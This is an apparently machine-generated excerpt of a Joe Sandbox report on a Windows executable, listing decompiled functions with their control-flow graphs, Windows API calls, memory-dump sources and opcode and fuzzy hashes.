Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
• String ID: D
• API String ID: 3356880605-2746444292
• Opcode ID: 770d44ed1041ee64a7928381d07257c9c34427f090ab778ebb374fa24b7d9dff
• Instruction ID: 0d26ff0b069f05ac7fc2137d7bf6f4c2b599b29ad8a4266bf43483a79dbd8d3d
• Opcode Fuzzy Hash: 770d44ed1041ee64a7928381d07257c9c34427f090ab778ebb374fa24b7d9dff
• Instruction Fuzzy Hash: CB1142B17442486EDB10EBE68C52FAEB7ACEF49714F50017BB604F72C2DA785D048A69

Control-flow Graph

APIs
• MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
Strings
Memory Dump Source
• Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: Message
• String ID: .tmp$y@
• API String ID: 2030045667-2396523267
• Opcode ID: bee86bb55ad694e4bb8d2acfeb1616fd5571fdc195b5f8f822b6cb6c9ded53ab
• Instruction ID: 9654b09d82b51144a4098a2dc8db18680232f6f81bb165c1e960a0c4f18209d5
• Opcode Fuzzy Hash: bee86bb55ad694e4bb8d2acfeb1616fd5571fdc195b5f8f822b6cb6c9ded53ab
• Instruction Fuzzy Hash: 6F419F30600204DFC715EF29DE91A5A7BA6FB89304B10453AF801B73E2DB79AC01DBAD

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message
                                                                                    • String ID: .tmp$y@
                                                                                    • API String ID: 2030045667-2396523267
                                                                                    • Opcode ID: 1b21aa8fed1238ce467e8651344fa0e4c36fa8da272615e6ac339cba9f98491f
                                                                                    • Instruction ID: 26cc71b999f7f6bdec311d51aeea5e314170344188b91b932b157060f98f8833
                                                                                    • Opcode Fuzzy Hash: 1b21aa8fed1238ce467e8651344fa0e4c36fa8da272615e6ac339cba9f98491f
                                                                                    • Instruction Fuzzy Hash: C5418030600204DFC715EF29DE91A5A7BA5FB49304B10453AF801B73E2CB79AC41DB9D

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                                    • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                    • String ID: .tmp
                                                                                    • API String ID: 1375471231-2986845003
                                                                                    • Opcode ID: 119d404e3ccd5ff43268e8edbbf371fc1c6e95f7b1ba86c01ca6a2cdd68a72df
                                                                                    • Instruction ID: 7d66a9fb3acca2a164fab1eb31a00c007328e74e7b0c548e792a27499ccb9c3a
                                                                                    • Opcode Fuzzy Hash: 119d404e3ccd5ff43268e8edbbf371fc1c6e95f7b1ba86c01ca6a2cdd68a72df
                                                                                    • Instruction Fuzzy Hash: A1213574A002099BDB05FFA1C9429DFB7B9EF88304F50457BE901B73C2DA7C9E059AA5

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 261 401430-40143d 262 401446-40144c 261->262 263 40143f-401444 261->263 264 401452-40146a VirtualAlloc 262->264 263->264 265 40146c-40147a call 4012e4 264->265 266 40148f-401492 264->266 265->266 269 40147c-40148d VirtualFree 265->269 269->266
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual$AllocFree
                                                                                    • String ID: 4F
                                                                                    • API String ID: 2087232378-474559816
                                                                                    • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                    • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                                    • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                    • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 330 407749-40774a 331 4076dc-4076e6 WriteFile 330->331 332 40774c-40776f 330->332 334 4076e8-4076ea call 40748c 331->334 335 4076ef-4076f2 331->335 333 407770-407785 332->333 336 407787 333->336 337 4077f9 333->337 334->335 339 407700-407704 335->339 340 4076f4-4076fb call 4073ec 335->340 342 40778a-40778f 336->342 343 4077fd-407802 336->343 344 40783b-40783d 337->344 345 4077fb 337->345 340->339 348 407803-407819 342->348 350 407791-407792 342->350 343->348 346 407841-407843 344->346 345->343 349 40785b-40785c 346->349 348->349 359 40781b 348->359 351 4078d6-4078eb call 407890 InterlockedExchange 349->351 352 40785e-40788c 349->352 353 407724-407741 350->353 354 407794-4077b4 350->354 375 407912-407917 351->375 376 4078ed-407910 351->376 369 407820-407823 352->369 370 407890-407893 352->370 356 407743 353->356 357 4077b5 353->357 354->357 361 407746-407747 356->361 362 4077b9 356->362 364 4077b6-4077b7 357->364 365 4077f7-4077f8 357->365 366 40781e-40781f 359->366 361->330 368 4077bb-4077cd 361->368 362->368 364->362 365->337 366->369 368->346 373 4077cf-4077d4 368->373 372 407898 369->372 374 407824 369->374 370->372 377 40789a 372->377 373->344 380 4077d6-4077de 373->380 374->377 379 407825 374->379 376->375 376->376 383 40789f 377->383 381 407896-407897 379->381 382 407826-40782d 379->382 380->333 392 4077e0 380->392 381->372 385 4078a1 382->385 386 40782f 382->386 383->385 390 4078a3 385->390 391 4078ac 385->391 388 407832-407833 386->388 389 4078a5-4078aa 386->389 388->344 388->366 393 4078ae-4078af 389->393 390->389 391->393 392->365 393->383 394 4078b1-4078bd 393->394 394->372 395 4078bf-4078c0 394->395
                                                                                    APIs
                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3934441357-0
                                                                                    • Opcode ID: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                                    • Instruction ID: ef7112967ca92329f6454244f41010afd6781152a6d2bd16d4b387d8db15cd6b
                                                                                    • Opcode Fuzzy Hash: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                                    • Instruction Fuzzy Hash: F951D12294D2910FC7126B7849685A53FE0FE5331532E92FBC5C1AB1A3D27CA847D35B

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 396 401658-40168d 397 4016c7-4016cd 396->397 398 40168f-40169a 397->398 399 4016cf-4016d4 397->399 400 40169c 398->400 401 40169f-4016a1 398->401 400->401 402 4016a3 401->402 403 4016a5-4016a7 401->403 402->403 404 4016c5 403->404 405 4016a9-4016b9 VirtualFree 403->405 404->397 405->404 406 4016bb 405->406 406->404
                                                                                    APIs
                                                                                    • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeVirtual
                                                                                    • String ID: 4F
                                                                                    • API String ID: 1263568516-474559816
                                                                                    • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                    • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                                    • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                    • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 407 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                                    • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLibraryLoadMode
                                                                                    • String ID:
                                                                                    • API String ID: 2987862817-0
                                                                                    • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                    • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                                    • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                    • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568
                                                                                    APIs
                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                                    • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                                      • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020703AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$FilePointer
                                                                                    • String ID:
                                                                                    • API String ID: 1156039329-0
                                                                                    • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                    • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                                    • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                    • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 411 40762c-40764a ReadFile 412 407663-40766a 411->412 413 40764c-407650 411->413 414 407652-40765a GetLastError 413->414 415 40765c-40765e call 40748c 413->415 414->412 414->415 415->412
                                                                                    APIs
                                                                                    • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                                    • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFileLastRead
                                                                                    • String ID:
                                                                                    • API String ID: 1948546556-0
                                                                                    • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                    • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                                    • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                    • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB
                                                                                    APIs
                                                                                    • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                                    • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                                      • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020703AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$FilePointer
                                                                                    • String ID:
                                                                                    • API String ID: 1156039329-0
                                                                                    • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                    • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                                                    • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                    • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                                                    APIs
                                                                                    • GetSystemDefaultLCID.KERNEL32(00000000,004053A6), ref: 0040528F
                                                                                      • Part of subcall function 00404CCC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CE9
                                                                                      • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                    • String ID:
                                                                                    • API String ID: 1658689577-0
                                                                                    • Opcode ID: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                                    • Instruction ID: 2407abf821673f044c2d0b48b7a4a38d2d1f2757cafa01d062fe92b1f2c090cc
                                                                                    • Opcode Fuzzy Hash: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                                    • Instruction Fuzzy Hash: 73314D75E0010AABCB00DF95C8C19EEB379FF84304F158977E815BB285E739AE059B98
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                    • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                                    • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                    • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                    • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                                    • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                    • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                                    APIs
                                                                                    • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                    • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                                                    • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                    • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                                                    APIs
                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                      • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020703AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFileLastWrite
                                                                                    • String ID:
                                                                                    • API String ID: 442123175-0
                                                                                    • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                    • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                                                    • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                    • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                                                    APIs
                                                                                    • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: FormatMessage
                                                                                    • String ID:
                                                                                    • API String ID: 1306739567-0
                                                                                    • Opcode ID: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                                                    • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                                                    • Opcode Fuzzy Hash: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                                                    • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                                                    APIs
                                                                                    • SetEndOfFile.KERNEL32(?,02087CA4,0040A08C,00000000), ref: 004076B3
                                                                                      • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020703AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFileLast
                                                                                    • String ID:
                                                                                    • API String ID: 734332943-0
                                                                                    • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                    • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                                                    • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                    • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode
                                                                                    • String ID:
                                                                                    • API String ID: 2340568224-0
                                                                                    • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                    • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                                                    • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                    • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
